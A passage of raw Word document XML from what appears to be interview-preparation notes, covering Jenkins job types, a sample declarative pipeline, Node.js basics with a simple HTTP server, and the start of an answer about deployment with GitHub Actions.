          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unstable (e.g., tests failed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C820F2E"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Logs are available in the console output for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D3AC4" w14:textId="77777777" w:rsidR="006C07EF"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7A3608FA">
          <v:rect id="_x0000_i3599" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49145023"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Jenkins Job Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B532DE0"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Freestyle Job</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Simple UI-based job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3113B814"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ipeline Job</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Defined using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Groovy script</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Jenkinsfile), allows complex workflows with stages and steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C89989A"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Multibranch Pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Auto-discovers branches and runs a separate pipeline per branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B034C6"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Declarative Pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Easier syntax for Jenkinsfile (preferred for modern CI/CD).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E547D3" w14:textId="77777777" w:rsidR="006C07EF"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6036193">
          <v:rect id="_x0000_i3600" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0156D3"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Sample Declarative Jenkins Pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546CA927"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pipeline {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A22877"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agent any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F73B44" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A977F7"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stages {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C3DE3"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stage('Checkout') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8EEA63"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steps {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C27EED"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git 'https://github.com/example/project.git'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8C3551"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E661DC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F44EB18" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FBDE13"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stage('Build') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56833706"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steps {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E2BCE5"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sh './gradlew build'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F755D41"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64876C11"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A49B6C5" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F5814D"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stage('Test') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6E49BB"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steps {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0F4DD8"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sh './gradlew test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A392D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE047CA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2F056C" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38EFCF6F"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stage('Deploy') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F5AEF0"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steps {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06451052"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echo 'Deploying to dev server...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228FD92E"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 Add deployment script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B86D1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABFAFE2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CB2E2B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB702E1" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F67B15"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post {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DCAC86"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success {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D346A1"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echo 'Pipeline executed successfully!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28495FF0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F23EAD"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failure {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655B2712"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echo 'Pipeline failed.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F6CE87"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E0DF3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2249F553"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A554706" w14:textId="77777777" w:rsidR="006C07EF"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AC2F687">
          <v:rect id="_x0000_i3601" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04926ACE"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Jenkins Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018081A"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Used to securely store passwords, tokens, and SSH keys for Git, DockerHub, AWS, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FB87D1" w14:textId="77777777" w:rsidR="006C07EF"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47886BD">
          <v:rect id="_x0000_i3602" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30962383" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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Jenkins Integrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADD1DC1"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Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB1B53"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Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4316C"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onarQube</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0648AFCA"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lastRenderedPageBreak/>
        <w:t>Slack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8C8AA9"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GitHub/GitLab/Bitbucket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B04AAB" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07E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Nexus/Artifactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588678A5" w14:textId="65E11D69" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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149CFEA1">
          <v:rect id="_x0000_i3603" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61495A4A" w14:textId="287C125E" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00702671">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="893" w:name="_Toc196308373"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Node JS</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="893"/>
    </w:p>
    <w:p w14:paraId="5259323D" w14:textId="041F7F10" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allows you to run </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JavaScript code outside of a browser</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — most commonly used to build </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server-side applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E932F0" w14:textId="77777777" w:rsidR="00663A15"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DB3DC68">
          <v:rect id="_x0000_i3604" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="075406CB" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9558E9" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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Built on Chrome’s V8 JavaScript Engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Executes JavaScript at high speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2580C135" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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synchronous &amp; Event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ideal for scalable, real-time applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5780CA92" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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ingle-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: But handles concurrent connections efficiently using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E82559" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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Uses JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: So frontend developers can write backend logic too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED86CC" w14:textId="77777777" w:rsidR="00663A15"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81B33E9">
          <v:rect id="_x0000_i3605" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1959142F" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096811EA" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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REST APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883F261" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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Real-time chat applications (e.g., Socket.io)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F6722A" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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treaming services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2186AA13" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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ommand-line tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46375545" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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erverless functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CF2503" w14:textId="77777777" w:rsidR="00663A15"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6A338F9">
          <v:rect id="_x0000_i3606" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBC1F9" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD5E26" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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A simple HTTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71B8D7" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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onst http = require('http');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CCCC32" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C28DEE" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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http.createServer((req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CBAF49" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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res.write('Hello from Node.js!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01107CD5" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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res.end();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7091ADC6" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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listen(3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC48031" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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Run it with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50768F2C" w14:textId="77777777" w:rsidR="00663A15" w:rsidRPr="00617E2C" w:rsidRDefault="00663A15"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node server.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3043766A" w14:textId="31B791D0" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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633635B7">
          <v:rect id="_x0000_i3607" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="325BCFAC" w14:textId="2A2D181C" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00107FFD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="894" w:name="_Toc196308374"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is your application getting deployed? Which platform are you using in your project</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="894"/>
    </w:p>
    <w:p w14:paraId="33963A03" w14:textId="336DD811" w:rsidR="00035FA4" w:rsidRPr="00617E2C" w:rsidRDefault="00035FA4" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In our project, the application is deployed using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CI/CD pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> set up in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GitHub Actions</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
